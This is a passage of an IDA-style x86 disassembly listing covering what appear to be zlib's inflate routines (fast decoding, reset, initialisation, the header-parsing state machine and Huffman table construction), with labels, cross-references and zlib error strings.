mov [ebp+arg_14], eax
mov eax, [esi+30h]
cmp ecx, eax
jnb short loc_41FEFB
sub eax, ecx
dec eax
jmp short loc_41FF00
; ---------------------------------------------------------------------------
loc_41FEFB: ; CODE XREF: sub_41FEC6+2E�j
mov eax, [esi+2Ch]
sub eax, ecx
loc_41FF00: ; CODE XREF: sub_41FEC6+33�j
mov [ebp+var_10], eax
mov eax, [ebp+arg_0]
mov eax, ds:dword_423318[eax*4]
mov [ebp+var_14], eax
mov eax, [ebp+arg_4]
mov eax, ds:dword_423318[eax*4]
mov [ebp+arg_4], eax
loc_41FF1D: ; CODE XREF: sub_41FEC6+72�j
; sub_41FEC6+231�j
cmp edx, 14h
jnb short loc_41FF3A
mov eax, [ebp+var_8]
dec [ebp+var_4]
mov ecx, edx
movzx eax, byte ptr [eax]
shl eax, cl
or [ebp+arg_14], eax
inc [ebp+var_8]
add edx, 8
jmp short loc_41FF1D
; ---------------------------------------------------------------------------
loc_41FF3A: ; CODE XREF: sub_41FEC6+5A�j
mov eax, [ebp+var_14]
mov ecx, [ebp+arg_8]
and eax, [ebp+arg_14]
lea eax, [ecx+eax*8]
movzx ecx, byte ptr [eax]
mov [ebp+arg_0], ecx
test ecx, ecx
loc_41FF4E: ; CODE XREF: sub_41FEC6+C4�j
movzx ecx, byte ptr [eax+1]
jz loc_4200D1
shr [ebp+arg_14], cl
movzx ecx, byte ptr [eax+1]
sub edx, ecx
mov ecx, [ebp+arg_0]
test cl, 10h
jnz short loc_41FF8C
test cl, 40h
jnz loc_420131
mov ecx, ds:dword_423318[ecx*4]
and ecx, [ebp+arg_14]
add ecx, [eax+4]
lea eax, [eax+ecx*8]
movzx ecx, byte ptr [eax]
mov [ebp+arg_0], ecx
test ecx, ecx
jmp short loc_41FF4E
; ---------------------------------------------------------------------------
loc_41FF8C: ; CODE XREF: sub_41FEC6+A1�j
and ecx, 0Fh
mov esi, ds:dword_423318[ecx*4]
and esi, [ebp+arg_14]
shr [ebp+arg_14], cl
add esi, [eax+4]
sub edx, ecx
mov [ebp+arg_0], esi
loc_41FFA4: ; CODE XREF: sub_41FEC6+F9�j
cmp edx, 0Fh
jnb short loc_41FFC1
mov eax, [ebp+var_8]
dec [ebp+var_4]
mov ecx, edx
movzx eax, byte ptr [eax]
shl eax, cl
or [ebp+arg_14], eax
inc [ebp+var_8]
add edx, 8
jmp short loc_41FFA4
; ---------------------------------------------------------------------------
loc_41FFC1: ; CODE XREF: sub_41FEC6+E1�j
mov eax, [ebp+arg_4]
mov ecx, [ebp+arg_C]
and eax, [ebp+arg_14]
movzx ebx, byte ptr [ecx+eax*8]
lea eax, [ecx+eax*8]
movzx ecx, byte ptr [eax+1]
shr [ebp+arg_14], cl
movzx ecx, byte ptr [eax+1]
sub edx, ecx
loc_41FFDE: ; CODE XREF: sub_41FEC6+146�j
test bl, 10h
jnz short loc_42000E
test bl, 40h
jnz loc_4200FC
mov ecx, ds:dword_423318[ebx*4]
and ecx, [ebp+arg_14]
add ecx, [eax+4]
movzx ebx, byte ptr [eax+ecx*8]
lea eax, [eax+ecx*8]
movzx ecx, byte ptr [eax+1]
shr [ebp+arg_14], cl
mov [ebp+var_18], ecx
sub edx, ecx
jmp short loc_41FFDE
; ---------------------------------------------------------------------------
loc_42000E: ; CODE XREF: sub_41FEC6+11B�j
and ebx, 0Fh
loc_420011: ; CODE XREF: sub_41FEC6+165�j
cmp edx, ebx
jnb short loc_42002D
mov ecx, [ebp+var_8]
dec [ebp+var_4]
movzx esi, byte ptr [ecx]
mov ecx, edx
shl esi, cl
or [ebp+arg_14], esi
inc [ebp+var_8]
add edx, 8
jmp short loc_420011
; ---------------------------------------------------------------------------
loc_42002D: ; CODE XREF: sub_41FEC6+14D�j
mov esi, ds:dword_423318[ebx*4]
mov ecx, ebx
and esi, [ebp+arg_14]
sub edx, ebx
shr [ebp+arg_14], cl
add esi, [eax+4]
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_C]
sub [ebp+var_10], eax
mov ebx, [ebp+arg_10]
mov eax, ecx
sub eax, esi
mov esi, [ebx+28h]
cmp eax, esi
jnb short loc_4200AD
mov ebx, [ebx+2Ch]
mov [ebp+var_18], ebx
sub ebx, esi
loc_420060: ; CODE XREF: sub_41FEC6+19E�j
add eax, ebx
cmp eax, esi
jb short loc_420060
mov esi, [ebp+var_18]
sub esi, eax
cmp [ebp+arg_0], esi
jbe short loc_42008F
sub [ebp+arg_0], esi
loc_420073: ; CODE XREF: sub_41FEC6+1B4�j
mov bl, [eax]
mov [ecx], bl
inc ecx
inc eax
dec esi
jnz short loc_420073
mov eax, [ebp+arg_10]
mov esi, [eax+28h]
loc_420082: ; CODE XREF: sub_41FEC6+1C5�j
mov al, [esi]
mov [ecx], al
inc ecx
inc esi
dec [ebp+arg_0]
jnz short loc_420082
jmp short loc_4200C9
; ---------------------------------------------------------------------------
loc_42008F: ; CODE XREF: sub_41FEC6+1A8�j
mov bl, [eax]
mov [ecx], bl
mov bl, [eax+1]
inc ecx
inc eax
mov [ecx], bl
inc ecx
inc eax
sub [ebp+arg_0], 2
loc_4200A0: ; CODE XREF: sub_41FEC6+1E3�j
mov bl, [eax]
mov [ecx], bl
inc ecx
inc eax
dec [ebp+arg_0]
jnz short loc_4200A0
jmp short loc_4200C9
; ---------------------------------------------------------------------------
loc_4200AD: ; CODE XREF: sub_41FEC6+190�j
mov bl, [eax]
mov [ecx], bl
mov bl, [eax+1]
inc ecx
inc eax
mov [ecx], bl
inc ecx
inc eax
sub [ebp+arg_0], 2
loc_4200BE: ; CODE XREF: sub_41FEC6+201�j
mov bl, [eax]
mov [ecx], bl
inc ecx
inc eax
dec [ebp+arg_0]
jnz short loc_4200BE
loc_4200C9: ; CODE XREF: sub_41FEC6+1C7�j
; sub_41FEC6+1E5�j
mov esi, [ebp+arg_10]
mov [ebp+var_C], ecx
jmp short loc_4200E8
; ---------------------------------------------------------------------------
loc_4200D1: ; CODE XREF: sub_41FEC6+8C�j
shr [ebp+arg_14], cl
movzx ecx, byte ptr [eax+1]
mov al, [eax+4]
sub edx, ecx
mov ecx, [ebp+var_C]
inc [ebp+var_C]
dec [ebp+var_10]
mov [ecx], al
loc_4200E8: ; CODE XREF: sub_41FEC6+209�j
cmp [ebp+var_10], 102h
jb short loc_42011C
cmp [ebp+var_4], 0Ah
jb short loc_42011C
jmp loc_41FF1D
; ---------------------------------------------------------------------------
loc_4200FC: ; CODE XREF: sub_41FEC6+120�j
mov ecx, [edi+4]
mov eax, edx
sub ecx, [ebp+var_4]
mov dword ptr [edi+18h], offset aInvalidDistanc ; "invalid distance code"
shr eax, 3
cmp eax, ecx
jnb short loc_420114
mov ecx, eax
loc_420114: ; CODE XREF: sub_41FEC6+24A�j
mov esi, [ebp+arg_10]
push 0FFFFFFFDh
pop eax
jmp short loc_420166
; ---------------------------------------------------------------------------
loc_42011C: ; CODE XREF: sub_41FEC6+229�j
; sub_41FEC6+22F�j
mov ecx, [edi+4]
mov eax, edx
sub ecx, [ebp+var_4]
shr eax, 3
cmp eax, ecx
jnb short loc_42012D
mov ecx, eax
loc_42012D: ; CODE XREF: sub_41FEC6+263�j
xor eax, eax
jmp short loc_420166
; ---------------------------------------------------------------------------
loc_420131: ; CODE XREF: sub_41FEC6+A6�j
test cl, 20h
jz short loc_42014B
mov ecx, [edi+4]
mov eax, edx
sub ecx, [ebp+var_4]
shr eax, 3
cmp eax, ecx
jnb short loc_420147
mov ecx, eax
loc_420147: ; CODE XREF: sub_41FEC6+27D�j
push 1
jmp short loc_420165
; ---------------------------------------------------------------------------
loc_42014B: ; CODE XREF: sub_41FEC6+26E�j
mov ecx, [edi+4]
mov eax, edx
sub ecx, [ebp+var_4]
mov dword ptr [edi+18h], offset aInvalidLiteral ; "invalid literal/length code"
shr eax, 3
cmp eax, ecx
jnb short loc_420163
mov ecx, eax
loc_420163: ; CODE XREF: sub_41FEC6+299�j
push 0FFFFFFFDh
loc_420165: ; CODE XREF: sub_41FEC6+283�j
pop eax
loc_420166: ; CODE XREF: sub_41FEC6+254�j
; sub_41FEC6+269�j
mov ebx, [ebp+arg_14]
sub [ebp+var_8], ecx
mov [esi+20h], ebx
mov ebx, ecx
shl ebx, 3
sub edx, ebx
mov [esi+1Ch], edx
mov edx, [ebp+var_4]
add ecx, edx
mov [edi+4], ecx
mov ecx, [ebp+var_8]
mov edx, ecx
sub edx, [edi]
mov [edi], ecx
mov ecx, [ebp+var_C]
add [edi+8], edx
mov [esi+34h], ecx
pop edi
pop esi
pop ebx
leave
retn
sub_41FEC6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420198 proc near ; CODE XREF: sub_42021C+D4�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
xor edx, edx
cmp eax, edx
jz short loc_4201D6
mov ecx, [eax+1Ch]
cmp ecx, edx
jz short loc_4201D6
push esi
mov [eax+14h], edx
mov [eax+8], edx
mov [eax+18h], edx
mov esi, [ecx+0Ch]
push edx
neg esi
sbb esi, esi
push eax
and esi, 7
mov [ecx], esi
mov eax, [eax+1Ch]
push dword ptr [eax+14h]
call sub_41EE2E
add esp, 0Ch
xor eax, eax
pop esi
pop ebp
retn
; ---------------------------------------------------------------------------
loc_4201D6: ; CODE XREF: sub_420198+A�j
; sub_420198+11�j
push 0FFFFFFFEh
pop eax
pop ebp
retn
sub_420198 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4201DB proc near ; CODE XREF: sub_42021C+C9�p
; sub_420CCE+59�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
test esi, esi
jz short loc_420216
mov eax, [esi+1Ch]
test eax, eax
jz short loc_420216
cmp dword ptr [esi+24h], 0
jz short loc_420216
mov eax, [eax+14h]
test eax, eax
jz short loc_420203
push esi
push eax
call sub_41F88B
pop ecx
pop ecx
loc_420203: ; CODE XREF: sub_4201DB+1D�j
push dword ptr [esi+1Ch]
push dword ptr [esi+28h]
call dword ptr [esi+24h]
and dword ptr [esi+1Ch], 0
pop ecx
pop ecx
xor eax, eax
jmp short loc_420219
; ---------------------------------------------------------------------------
loc_420216: ; CODE XREF: sub_4201DB+9�j
; sub_4201DB+10�j ...
push 0FFFFFFFEh
pop eax
loc_420219: ; CODE XREF: sub_4201DB+39�j
pop esi
pop ebp
retn
sub_4201DB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42021C proc near ; CODE XREF: sub_420306+E�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
mov eax, [ebp+arg_8]
push ebx
push esi
push edi
xor edi, edi
cmp eax, edi
jz loc_4202FE
mov al, [eax]
cmp al, ds:byte_4220A8
jnz loc_4202FE
cmp [ebp+arg_C], 38h
jnz loc_4202FE
mov esi, [ebp+arg_0]
cmp esi, edi
jnz short loc_420255
push 0FFFFFFFEh
jmp loc_420300
; ---------------------------------------------------------------------------
loc_420255: ; CODE XREF: sub_42021C+30�j
cmp [esi+20h], edi
mov [esi+18h], edi
jnz short loc_420267
mov dword ptr [esi+20h], offset sub_420D4D
mov [esi+28h], edi
loc_420267: ; CODE XREF: sub_42021C+3F�j
cmp [esi+24h], edi
jnz short loc_420273
mov dword ptr [esi+24h], offset sub_420D67
loc_420273: ; CODE XREF: sub_42021C+4E�j
push 18h
push 1
pop ebx
push ebx
push dword ptr [esi+28h]
call dword ptr [esi+20h]
add esp, 0Ch
cmp eax, edi
mov [esi+1Ch], eax
jnz short loc_42028D
push 0FFFFFFFCh
jmp short loc_420300
; ---------------------------------------------------------------------------
loc_42028D: ; CODE XREF: sub_42021C+6B�j
mov ecx, [ebp+arg_4]
mov [eax+14h], edi
mov eax, [esi+1Ch]
cmp ecx, edi
mov [eax+0Ch], edi
jge short loc_4202A5
mov eax, [esi+1Ch]
neg ecx
mov [eax+0Ch], ebx
loc_4202A5: ; CODE XREF: sub_42021C+7F�j
cmp ecx, 8
jl short loc_4202FA
cmp ecx, 0Fh
jg short loc_4202FA
mov eax, [esi+1Ch]
shl ebx, cl
mov [eax+10h], ecx
mov eax, [esi+1Ch]
mov eax, [eax+0Ch]
neg eax
sbb eax, eax
push ebx
not eax
and eax, offset sub_410F9C
push eax
push esi
call sub_41EE9A
mov ecx, [esi+1Ch]
add esp, 0Ch
mov [ecx+14h], eax
mov eax, [esi+1Ch]
cmp [eax+14h], edi
jnz short loc_4202EF
push 0FFFFFFFCh
loc_4202E3: ; CODE XREF: sub_42021C+E0�j
pop edi
push esi
call sub_4201DB
pop ecx
mov eax, edi
jmp short loc_420301
; ---------------------------------------------------------------------------
loc_4202EF: ; CODE XREF: sub_42021C+C3�j
push esi
call sub_420198
pop ecx
xor eax, eax
jmp short loc_420301
; ---------------------------------------------------------------------------
loc_4202FA: ; CODE XREF: sub_42021C+8C�j
; sub_42021C+91�j
push 0FFFFFFFEh
jmp short loc_4202E3
; ---------------------------------------------------------------------------
loc_4202FE: ; CODE XREF: sub_42021C+D�j
; sub_42021C+1B�j ...
push 0FFFFFFFAh
loc_420300: ; CODE XREF: sub_42021C+34�j
; sub_42021C+6F�j
pop eax
loc_420301: ; CODE XREF: sub_42021C+D1�j
; sub_42021C+DC�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_42021C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420306 proc near ; CODE XREF: sub_420CCE+35�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push [ebp+arg_8]
push [ebp+arg_4]
push 0Fh
push [ebp+arg_0]
call sub_42021C
add esp, 10h
pop ebp
retn
sub_420306 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42031E proc near ; CODE XREF: sub_420CCE+47�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+arg_0]
xor eax, eax
cmp esi, eax
push edi
jz loc_420630 ; default
cmp [esi+1Ch], eax
jz loc_420630 ; default
cmp [esi], eax
jz loc_420630 ; default
cmp [ebp+arg_4], 4
push 0FFFFFFFBh
pop ebx
mov [ebp+arg_4], ebx
jz short loc_420351
mov [ebp+arg_4], eax
loc_420351: ; CODE XREF: sub_42031E+2E�j
; sub_42031E+111�j
push 0Dh
pop edi
loc_420354: ; CODE XREF: sub_42031E+8A�j
; sub_42031E+FA�j ...
mov eax, [esi+1Ch]
mov ecx, [eax]
cmp ecx, edi ; switch 14 cases
ja loc_420630 ; default
jmp ds:off_420649[ecx*4] ; switch jump
loc_420368: ; DATA XREF: _3:off_420649�o
mov ecx, [esi+4] ; jumptable 00420361 case 0
test ecx, ecx
jz loc_42055A
dec ecx
inc dword ptr [esi+8]
mov [esi+4], ecx
mov ecx, [esi]
mov ebx, [ebp+arg_4]
movzx ecx, byte ptr [ecx]
mov [eax+4], ecx
mov eax, [esi+1Ch]
mov ecx, [eax+4]
and ecx, 0Fh
inc dword ptr [esi]
cmp cl, 8
jz short loc_4203AA
mov [eax], edi
mov dword ptr [esi+18h], offset aUnknownCompres ; "unknown compression method"
loc_42039E: ; CODE XREF: sub_42031E+A3�j
; sub_42031E+237�j
mov eax, [esi+1Ch]
mov dword ptr [eax+4], 5
jmp short loc_420354
; ---------------------------------------------------------------------------
loc_4203AA: ; CODE XREF: sub_42031E+75�j
mov ecx, [eax+4]
shr ecx, 4
add ecx, 8
cmp ecx, [eax+10h]
jbe short loc_4203C3
mov [eax], edi
mov dword ptr [esi+18h], offset aInvalidWindowS ; "invalid window size"
jmp short loc_42039E
; ---------------------------------------------------------------------------
loc_4203C3: ; CODE XREF: sub_42031E+98�j
mov dword ptr [eax], 1
loc_4203C9: ; CODE XREF: sub_42031E+43�j
; DATA XREF: _3:off_420649�o
mov eax, [esi+4] ; jumptable 00420361 case 1
test eax, eax
jz loc_42055A
mov ecx, [ebp+arg_4]
dec eax
inc dword ptr [esi+8]
mov [esi+4], eax
mov eax, [esi]
mov [ebp+arg_0], ecx
mov ecx, [esi+1Ch]
push 1Fh
movzx ebx, byte ptr [eax]
inc eax
xor edx, edx
mov [esi], eax
mov eax, [ecx+4]
shl eax, 8
add eax, ebx
pop edi
div edi
test edx, edx
jz short loc_42041D
push 0Dh
mov ebx, [ebp+arg_0]
pop edi
mov [ecx], edi
mov eax, [esi+1Ch]
mov dword ptr [esi+18h], offset aIncorrectHeade ; "incorrect header check"
mov dword ptr [eax+4], 5
jmp loc_420354
; ---------------------------------------------------------------------------
loc_42041D: ; CODE XREF: sub_42031E+DF�j
test bl, 20h
jnz loc_420561
mov ebx, [ebp+arg_0]
mov dword ptr [ecx], 7
jmp loc_420351
; ---------------------------------------------------------------------------
loc_420434: ; CODE XREF: sub_42031E+43�j
; DATA XREF: _3:off_420649�o
push ebx ; jumptable 00420361 case 7
push esi
push dword ptr [eax+14h]
call sub_41EF26
mov ebx, eax
add esp, 0Ch
cmp ebx, 0FFFFFFFDh
jnz short loc_420459
mov eax, [esi+1Ch]
mov [eax], edi
mov eax, [esi+1Ch]
and dword ptr [eax+4], 0
jmp loc_420354
; ---------------------------------------------------------------------------
loc_420459: ; CODE XREF: sub_42031E+128�j
test ebx, ebx
jnz short loc_420460
mov ebx, [ebp+arg_4]
loc_420460: ; CODE XREF: sub_42031E+13D�j
cmp ebx, 1
jnz loc_42055A
mov eax, [esi+1Ch]
mov ebx, [ebp+arg_4]
lea ecx, [eax+4]
push ecx
push esi
push dword ptr [eax+14h]
call sub_41EE2E
mov eax, [esi+1Ch]
add esp, 0Ch
cmp dword ptr [eax+0Ch], 0
jz short loc_420493
mov dword ptr [eax], 0Ch
jmp loc_420354
; ---------------------------------------------------------------------------
loc_420493: ; CODE XREF: sub_42031E+168�j
mov dword ptr [eax], 8
loc_420499: ; CODE XREF: sub_42031E+43�j
; DATA XREF: _3:off_420649�o
mov eax, [esi+4] ; jumptable 00420361 case 8
test eax, eax
jz loc_42055A
dec eax
inc dword ptr [esi+8]
mov ecx, [esi+1Ch]
mov [esi+4], eax
mov eax, [esi]
mov ebx, [ebp+arg_4]
movzx eax, byte ptr [eax]
shl eax, 18h
mov [ecx+8], eax
mov eax, [esi+1Ch]
inc dword ptr [esi]
mov dword ptr [eax], 9
loc_4204C7: ; CODE XREF: sub_42031E+43�j
; DATA XREF: _3:off_420649�o
mov eax, [esi+4] ; jumptable 00420361 case 9
test eax, eax
jz loc_42055A
mov ecx, [esi]
dec eax
inc dword ptr [esi+8]
mov [esi+4], eax
movzx ecx, byte ptr [ecx]
mov eax, [esi+1Ch]
mov ebx, [ebp+arg_4]
shl ecx, 10h
add [eax+8], ecx
mov eax, [esi+1Ch]
inc dword ptr [esi]
mov dword ptr [eax], 0Ah
loc_4204F5: ; CODE XREF: sub_42031E+43�j
; DATA XREF: _3:off_420649�o
mov eax, [esi+4] ; jumptable 00420361 case 10
test eax, eax
jz short loc_42055A
mov ecx, [esi]
dec eax
inc dword ptr [esi+8]
mov [esi+4], eax
movzx ecx, byte ptr [ecx]
mov eax, [esi+1Ch]
mov ebx, [ebp+arg_4]
shl ecx, 8
add [eax+8], ecx
mov eax, [esi+1Ch]
inc dword ptr [esi]
mov dword ptr [eax], 0Bh
loc_42051F: ; CODE XREF: sub_42031E+43�j
; DATA XREF: _3:off_420649�o
mov eax, [esi+4] ; jumptable 00420361 case 11
test eax, eax
jz short loc_42055A
mov ecx, [esi]
dec eax
inc dword ptr [esi+8]
mov [esi+4], eax
movzx ecx, byte ptr [ecx]
mov eax, [esi+1Ch]
mov ebx, [ebp+arg_4]
add [eax+8], ecx
mov eax, [esi+1Ch]
inc dword ptr [esi]
mov ecx, [eax+4]
cmp ecx, [eax+8]
jz loc_420638
mov [eax], edi
mov dword ptr [esi+18h], offset aIncorrectDataC ; "incorrect data check"
jmp loc_42039E
; ---------------------------------------------------------------------------
loc_42055A: ; CODE XREF: sub_42031E+4F�j
; sub_42031E+B0�j ...
mov eax, ebx
jmp loc_420633
; ---------------------------------------------------------------------------
loc_420561: ; CODE XREF: sub_42031E+102�j
mov eax, [esi+1Ch]
mov ebx, [ebp+arg_0]
mov dword ptr [eax], 2
loc_42056D: ; CODE XREF: sub_42031E+43�j
; DATA XREF: _3:off_420649�o
mov eax, [esi+4] ; jumptable 00420361 case 2
test eax, eax
jz short loc_42055A
dec eax
inc dword ptr [esi+8]
mov ecx, [esi+1Ch]
mov [esi+4], eax
mov eax, [esi]
mov ebx, [ebp+arg_4]
movzx eax, byte ptr [eax]
shl eax, 18h
mov [ecx+8], eax
mov eax, [esi+1Ch]
inc dword ptr [esi]
mov dword ptr [eax], 3
loc_420597: ; CODE XREF: sub_42031E+43�j
; DATA XREF: _3:off_420649�o
mov eax, [esi+4] ; jumptable 00420361 case 3
test eax, eax
jz short loc_42055A
mov ecx, [esi]
dec eax
inc dword ptr [esi+8]
mov [esi+4], eax
movzx ecx, byte ptr [ecx]
mov eax, [esi+1Ch]
mov ebx, [ebp+arg_4]
shl ecx, 10h
add [eax+8], ecx
mov eax, [esi+1Ch]
inc dword ptr [esi]
mov dword ptr [eax], 4
loc_4205C1: ; CODE XREF: sub_42031E+43�j
; DATA XREF: _3:off_420649�o
mov eax, [esi+4] ; jumptable 00420361 case 4
test eax, eax
jz short loc_42055A
mov ecx, [esi]
dec eax
inc dword ptr [esi+8]
mov [esi+4], eax
movzx ecx, byte ptr [ecx]
mov eax, [esi+1Ch]
mov ebx, [ebp+arg_4]
shl ecx, 8
add [eax+8], ecx
mov eax, [esi+1Ch]
inc dword ptr [esi]
mov dword ptr [eax], 5
loc_4205EB: ; CODE XREF: sub_42031E+43�j
; DATA XREF: _3:off_420649�o
mov eax, [esi+4] ; jumptable 00420361 case 5
test eax, eax
jz loc_42055A
mov ecx, [esi]
dec eax
inc dword ptr [esi+8]
mov [esi+4], eax
movzx ecx, byte ptr [ecx]
mov eax, [esi+1Ch]
push 2
add [eax+8], ecx
mov eax, [esi+1Ch]
inc dword ptr [esi]
mov ecx, [eax+8]
mov [esi+30h], ecx
mov dword ptr [eax], 6
jmp short loc_420632
; ---------------------------------------------------------------------------
loc_42061D: ; CODE XREF: sub_42031E+43�j
; DATA XREF: _3:off_420649�o
mov eax, [esi+1Ch] ; jumptable 00420361 case 6
mov [eax], edi
mov eax, [esi+1Ch]
mov dword ptr [esi+18h], offset aNeedDictionary ; "need dictionary"
and dword ptr [eax+4], 0
loc_420630: ; CODE XREF: sub_42031E+D�j
; sub_42031E+16�j ...
push 0FFFFFFFEh ; default
loc_420632: ; CODE XREF: sub_42031E+2FD�j
; sub_42031E+325�j ...
pop eax
loc_420633: ; CODE XREF: sub_42031E+23E�j
pop edi
pop esi
pop ebx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_420638: ; CODE XREF: sub_42031E+228�j
mov eax, [esi+1Ch]
mov dword ptr [eax], 0Ch
loc_420641: ; CODE XREF: sub_42031E+43�j
; DATA XREF: _3:off_420649�o
push 1 ; jumptable 00420361 case 12
jmp short loc_420632
; ---------------------------------------------------------------------------
loc_420645: ; CODE XREF: sub_42031E+43�j
; DATA XREF: _3:off_420649�o
push 0FFFFFFFDh ; jumptable 00420361 case 13
jmp short loc_420632
sub_42031E endp
; ---------------------------------------------------------------------------
off_420649 dd offset loc_420368 ; DATA XREF: sub_42031E+43�r
dd offset loc_4203C9 ; jump table for switch statement
dd offset loc_42056D
dd offset loc_420597
dd offset loc_4205C1
dd offset loc_4205EB
dd offset loc_42061D
dd offset loc_420434
dd offset loc_420499
dd offset loc_4204C7
dd offset loc_4204F5
dd offset loc_42051F
dd offset loc_420641
dd offset loc_420645
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420681 proc near ; CODE XREF: sub_41EF26+3C5�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push esi
mov esi, [ebp+arg_10]
push 4
push 13h
push dword ptr [esi+28h]
call dword ptr [esi+20h]
add esp, 0Ch
mov [ebp+arg_10], eax
test eax, eax
jnz short loc_4206A6
push 0FFFFFFFCh
pop eax
jmp short loc_4206FD
; ---------------------------------------------------------------------------
loc_4206A6: ; CODE XREF: sub_420681+1E�j
push ebx
push eax
lea eax, [ebp+var_4]
push eax
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_8]
push 0
push 0
push 13h
push 13h
push [ebp+arg_0]
call sub_420700
mov ebx, eax
add esp, 28h
cmp ebx, 0FFFFFFFDh
jnz short loc_4206D8
mov dword ptr [esi+18h], offset aOversubscribed ; "oversubscribed dynamic bit lengths tree"...
jmp short loc_4206EF
; ---------------------------------------------------------------------------
loc_4206D8: ; CODE XREF: sub_420681+4C�j
cmp ebx, 0FFFFFFFBh
jz short loc_4206E5
mov eax, [ebp+arg_4]
cmp dword ptr [eax], 0
jnz short loc_4206EF
loc_4206E5: ; CODE XREF: sub_420681+5A�j
push 0FFFFFFFDh
mov dword ptr [esi+18h], offset aIncompleteDyna ; "incomplete dynamic bit lengths tree"
pop ebx
loc_4206EF: ; CODE XREF: sub_420681+55�j
; sub_420681+62�j
push [ebp+arg_10]
push dword ptr [esi+28h]
call dword ptr [esi+24h]
pop ecx
mov eax, ebx
pop ecx
pop ebx
loc_4206FD: ; CODE XREF: sub_420681+23�j
pop esi
leave
retn
sub_420681 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420700 proc near ; CODE XREF: sub_420681+3F�p
; sub_420A87+52�p ...
var_F0 = dword ptr -0F0h
var_B4 = dword ptr -0B4h
var_B0 = dword ptr -0B0h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
push ebp
mov ebp, esp
sub esp, 0F0h
mov ecx, [ebp+arg_0]
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
xor edx, edx
mov [ebp+var_74], edx
mov [ebp+var_70], edx
mov [ebp+var_6C], edx
mov [ebp+var_68], edx
mov [ebp+var_64], edx
mov [ebp+var_60], edx
mov [ebp+var_5C], edx
mov [ebp+var_58], edx
mov [ebp+var_54], edx
mov [ebp+var_50], edx
mov [ebp+var_4C], edx
mov [ebp+var_48], edx
mov [ebp+var_44], edx
mov [ebp+var_40], edx
mov [ebp+var_3C], edx
mov [ebp+var_38], edx
mov esi, edi
loc_420746: ; CODE XREF: sub_420700+54�j
mov eax, [ecx]
add ecx, 4
inc [ebp+eax*4+var_74]
lea eax, [ebp+eax*4+var_74]
dec esi
jnz short loc_420746
cmp [ebp+var_74], edi
jnz short loc_42076C
mov eax, [ebp+arg_14]
mov [eax], edx
mov eax, [ebp+arg_18]
mov [eax], edx
loc_420765: ; CODE XREF: sub_420700+36F�j
; sub_420700+379�j
xor eax, eax
loc_420767: ; CODE XREF: sub_420700+382�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_42076C: ; CODE XREF: sub_420700+59�j
mov edi, [ebp+arg_18]
push 1
pop ebx
lea eax, [ebp+var_70]
mov esi, [edi]
mov ecx, ebx
mov [ebp+arg_18], esi
loc_42077C: ; CODE XREF: sub_420700+87�j
cmp [eax], edx
jnz short loc_420789
inc ecx
add eax, 4
cmp ecx, 0Fh
jbe short loc_42077C
loc_420789: ; CODE XREF: sub_420700+7E�j
cmp esi, ecx
mov [ebp+var_4], ecx
jnb short loc_420793
mov [ebp+arg_18], ecx
loc_420793: ; CODE XREF: sub_420700+8E�j
push 0Fh
lea esi, [ebp+var_38]
pop eax
loc_420799: ; CODE XREF: sub_420700+A3�j
cmp [esi], edx
jnz short loc_4207A5
dec eax
sub esi, 4
cmp eax, edx
jnz short loc_420799
loc_4207A5: ; CODE XREF: sub_420700+9B�j
cmp [ebp+arg_18], eax
mov [ebp+var_18], eax
jbe short loc_4207B0
mov [ebp+arg_18], eax
loc_4207B0: ; CODE XREF: sub_420700+AB�j
mov esi, [ebp+arg_18]
shl ebx, cl
cmp ecx, eax
mov [edi], esi
jnb short loc_4207D1
lea esi, [ebp+ecx*4+var_74]
loc_4207BF: ; CODE XREF: sub_420700+CF�j
sub ebx, [esi]
js loc_4208F7
inc ecx
add esi, 4
shl ebx, 1
cmp ecx, eax
jb short loc_4207BF
loc_4207D1: ; CODE XREF: sub_420700+B9�j
mov esi, eax
shl esi, 2
mov edi, [ebp+esi+var_74]
lea ecx, [ebp+esi+var_74]
sub ebx, edi
mov [ebp+var_30], ebx
